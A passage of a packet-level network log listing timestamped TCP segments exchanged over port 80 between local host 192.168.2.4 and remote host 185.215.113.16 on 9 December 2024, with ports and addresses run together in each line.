                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.241225958 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.241337061 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.241972923 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242011070 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242012978 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242022038 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242053032 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242162943 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242791891 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242851019 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242860079 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242880106 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.242907047 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.243057966 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.243598938 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.243643045 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.243660927 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.243670940 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.243701935 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.243825912 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.244405031 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.244445086 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.244478941 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.244492054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.244529009 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.244668961 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.245249987 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.245296001 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.245322943 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.245335102 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.245373964 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.245491028 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.246095896 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.246149063 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.246160030 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.246191978 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.246303082 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.246896029 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247028112 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247037888 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247062922 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247091055 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247143030 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247709990 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247750998 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247786045 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247796059 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247833967 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.247950077 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.248560905 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.248615026 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.248629093 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.248651028 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.248676062 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.248820066 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.249371052 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.249463081 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.249473095 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.249499083 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.249526024 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.249790907 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.250200987 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.250236034 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.250276089 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.250286102 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.250319958 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.250449896 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.251003981 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.251069069 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.251131058 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.251141071 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.251174927 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.251297951 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.251976013 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252015114 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252029896 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252041101 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252079010 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252196074 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252743959 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252788067 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252790928 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252799034 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252842903 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.252908945 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.253532887 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.253571987 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.253586054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.253597021 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.253632069 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.253771067 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.254353046 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.254389048 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.254441977 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.254453897 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.254492044 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.254652023 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.255166054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.255254984 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.255264997 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.255287886 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.255317926 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.255430937 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.255990982 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256057024 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256067038 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256072044 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256119013 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256289959 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256869078 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256957054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256967068 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.256983042 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.257014990 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.257117033 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.257647991 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.257711887 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.257721901 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.257760048 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.257889986 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.258497953 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.258560896 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.258572102 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.258603096 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.258613110 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.258734941 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.259330988 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.259421110 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.259430885 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.259463072 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.259555101 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.260180950 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.260299921 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.260309935 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.260349989 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.260452986 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.260956049 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.260997057 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261054039 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261065006 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261109114 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261188984 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261816978 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261898041 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261910915 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.261946917 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.262099981 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.262622118 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.262665987 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.262696981 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.262707949 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.262738943 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.262864113 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.263478041 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.263519049 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.263561010 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.263571978 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.263602018 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.263691902 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.264305115 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.264380932 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.264390945 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.264420033 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.264436960 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.264611959 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265099049 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265141010 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265156031 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265166998 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265211105 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265346050 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265897989 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265942097 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265979052 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.265990019 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.266021967 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.266151905 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.266737938 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.266834974 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.266844988 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.266874075 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.266978025 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.267596006 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.267656088 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.267668009 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.267692089 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.267718077 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.746149063 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.746773958 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.779565096 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.780006886 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.865443945 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.865529060 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.865540028 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.865571022 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866044998 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866190910 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866202116 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866213083 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866252899 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866298914 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866663933 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866708040 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866718054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866736889 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866765976 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.866848946 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.867485046 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.867536068 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.867547035 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.867574930 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.867599964 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.867705107 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.868298054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.868340015 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.868376970 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.868407011 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.868444920 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.868506908 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.869168043 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.869211912 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.869214058 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.869225025 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.869261026 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.869441986 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.869939089 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870007038 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870018005 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870024920 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870054960 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870187998 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870817900 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870852947 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870863914 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870872021 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.870899916 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.871037960 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.871627092 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.871706963 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.871716976 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.871730089 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.871745110 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.871850967 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872381926 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872416019 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872445107 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872454882 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872493029 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872880936 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872965097 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.872975111 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.873013020 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.873090982 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.873740911 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.873752117 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.873766899 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.873785019 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.873964071 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.874541044 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.874584913 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.874610901 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.874622107 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.874659061 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.874829054 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.874931097 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.875344038 CET8049868185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:49.875446081 CET8049868185.215.113.16192.168.2.4
